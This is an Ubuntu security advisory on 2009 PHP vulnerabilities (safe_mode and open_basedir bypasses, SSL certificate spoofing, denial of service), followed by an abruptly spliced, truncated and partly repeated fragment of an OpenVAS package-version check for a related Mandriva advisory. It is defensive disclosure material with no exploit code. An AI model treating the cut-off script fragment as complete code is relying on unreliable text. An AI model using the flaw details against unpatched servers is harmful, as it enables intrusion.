ID: USN-862-1
Type: ubuntu
Reporter: Ubuntu
Modified: 2009-11-26T00:00:00
Description
Maksymilian Arciemowicz discovered that PHP did not properly validate
arguments to the dba_replace function. If a script passed untrusted input
to the dba_replace function, an attacker could truncate the database. This
issue only applied to Ubuntu 6.06 LTS, 8.04 LTS, and 8.10. (CVE-2008-7068)

It was discovered that PHP's php_openssl_apply_verification_policy
function did not correctly handle SSL certificates with zero bytes in the
Common Name. A remote attacker could exploit this to perform a man in the
middle attack to view sensitive information or alter encrypted
communications. (CVE-2009-3291)

It was discovered that PHP did not properly handle certain malformed images
when being parsed by the Exif module. A remote attacker could exploit this
flaw and cause the PHP server to crash, resulting in a denial of service.
(CVE-2009-3292)

Grzegorz Stachowiak discovered that PHP did not properly enforce
restrictions in the tempnam function. An attacker could exploit this issue
to bypass safe_mode restrictions. (CVE-2009-3557)

Grzegorz Stachowiak discovered that PHP did not properly enforce
restrictions in the posix_mkfifo function. An attacker could exploit this
issue to bypass open_basedir restrictions. (CVE-2009-3558)

Bogdan Calin discovered that PHP did not limit the number of temporary
files created when handling multipart/form-data POST requests. A remote
attacker could exploit this flaw and cause the PHP server to consume all
available resources, resulting in a denial of service. (CVE-2009-4017)

ATTENTION: This update changes previous PHP behaviour by limiting the
number of files in a POST request to 50. This may be increased by adding a
"max_file_uploads" directive to the php.ini configuration file.

It was discovered that PHP did not properly enforce restrictions in the
proc_open function. An attacker could exploit this issue to bypass
safe_mode_protected_env_vars restrictions and possibly execute arbitrary
code with application privileges. (CVE-2009-4018)

Title: PHP vulnerabilities
Published: 2009-11-26T00:00:00
CVSS: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Advisory: https://ubuntu.com/security/notices/USN-862-1

Affected packages
Versions earlier than those listed are affected.

Ubuntu 6.06:
  libapache2-mod-php5 5.1.2-1ubuntu3.17
  php5-cgi 5.1.2-1ubuntu3.17
  php5-cli 5.1.2-1ubuntu3.17

Ubuntu 8.04:
  libapache2-mod-php5 5.2.4-2ubuntu5.9
  php5-cgi 5.2.4-2ubuntu5.9
  php5-cli 5.2.4-2ubuntu5.9

Ubuntu 8.10:
  libapache2-mod-php5 5.2.6-2ubuntu4.5
  php5-cgi 5.2.6-2ubuntu4.5
  php5-cli 5.2.6-2ubuntu4.5

Ubuntu 9.04:
  libapache2-mod-php5 5.2.6.dfsg.1-3ubuntu4.4
  php5-cgi 5.2.6.dfsg.1-3ubuntu4.4
  php5-cli 5.2.6.dfsg.1-3ubuntu4.4

Ubuntu 9.10:
  libapache2-mod-php5 5.2.10.dfsg.1-2ubuntu6.3
  php5-cgi 5.2.10.dfsg.1-2ubuntu6.3
  php5-cli 5.2.10.dfsg.1-2ubuntu6.3
isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbx\", rpm:\"php-dbx~1.1.0~26.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dio\", rpm:\"php-dio~0.0.2~3.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-eaccelerator\", rpm:\"php-eaccelerator~0.9.5.3~8.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-eaccelerator-admin\", rpm:\"php-eaccelerator-admin~0.9.5.3~8.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fam\", rpm:\"php-fam~5.0.1~7.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fileinfo\", rpm:\"php-fileinfo~1.0.4~15.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filepro\", rpm:\"php-filepro~5.1.6~17.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report 
+= res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-idn\", rpm:\"php-idn~1.2b~15.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ini\", rpm:\"php-ini~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcal\", rpm:\"php-mcal~0.6~27.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-optimizer\", rpm:\"php-optimizer~0.1~0.alpha1.5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.11~0.2mdv2009.1\", 
rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sasl\", rpm:\"php-sasl~0.1.0~25.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ssh2\", rpm:\"php-ssh2~0.11.0~2.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-suhosin\", 
rpm:\"php-suhosin~0.9.29~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sybase\", rpm:\"php-sybase~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tclink\", rpm:\"php-tclink~3.4.4~10.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-translit\", rpm:\"php-translit~0.6.0~7.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-vld\", rpm:\"php-vld~0.9.1~8.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xattr\", rpm:\"php-xattr~1.1.0~6.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xdebug\", rpm:\"php-xdebug~2.0.5~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zip\", rpm:\"php-zip~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4018", "CVE-2009-4017", "CVE-2009-3557"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:303.", "modified": "2018-04-06T00:00:00", "published": "2009-12-03T00:00:00", "id": "OPENVAS:136141256231066320", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066320", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:303 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_303.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:303 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Some vulnerabilities were discovered and corrected in php-5.2.11:\n\nThe tempnam function in ext/standard/file.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers\nto bypass safe_mode restrictions, and create files in group-writable\nor world-writable directories, via the dir and prefix arguments\n(CVE-2009-3557).\n\nThe posix_mkfifo function in ext/posix/posix.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers\nto bypass open_basedir restrictions, and create FIFO files, via the\npathname and mode arguments, as demonstrated by creating a .htaccess\nfile (CVE-2009-3558).\n\nPHP 5.2.11, and 5.3.x before 5.3.1, does not restrict the number\nof temporary files created when handling a multipart/form-data POST\nrequest, which allows remote attackers to cause a denial of service\n(resource exhaustion), and makes it easier for remote attackers to\nexploit local file inclusion vulnerabilities, via multiple requests,\nrelated to lack of support for the max_file_uploads 
directive\n(CVE-2009-4017).\n\nThe proc_open function in ext/standard/proc_open.c in PHP\nbefore 5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)\nsafe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars\ndirectives, which allows context-dependent attackers to execute\nprograms with an arbitrary environment via the env parameter, as\ndemonstrated by a crafted value of the LD_LIBRARY_PATH environment\nvariable (CVE-2009-4018).\n\nIntermittent segfaults occurred on x86_64 with the latest phpmyadmin\nand with apache (#53735).\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.\n\nAffected: 2009.1\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:303\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:303.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66320\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-03 22:10:42 +0100 (Thu, 03 Dec 2009)\");\n script_cve_id(\"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:303 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache-mod_php\", rpm:\"apache-mod_php~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-apc\", rpm:\"php-apc~3.1.3p1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-apc-admin\", rpm:\"php-apc-admin~3.1.3p1~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbx\", rpm:\"php-dbx~1.1.0~26.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dio\", rpm:\"php-dio~0.0.2~3.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-eaccelerator\", rpm:\"php-eaccelerator~0.9.5.3~8.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-eaccelerator-admin\", rpm:\"php-eaccelerator-admin~0.9.5.3~8.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fam\", rpm:\"php-fam~5.0.1~7.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fileinfo\", rpm:\"php-fileinfo~1.0.4~15.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filepro\", rpm:\"php-filepro~5.1.6~17.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report 
+= res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-idn\", rpm:\"php-idn~1.2b~15.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ini\", rpm:\"php-ini~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcal\", rpm:\"php-mcal~0.6~27.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = 
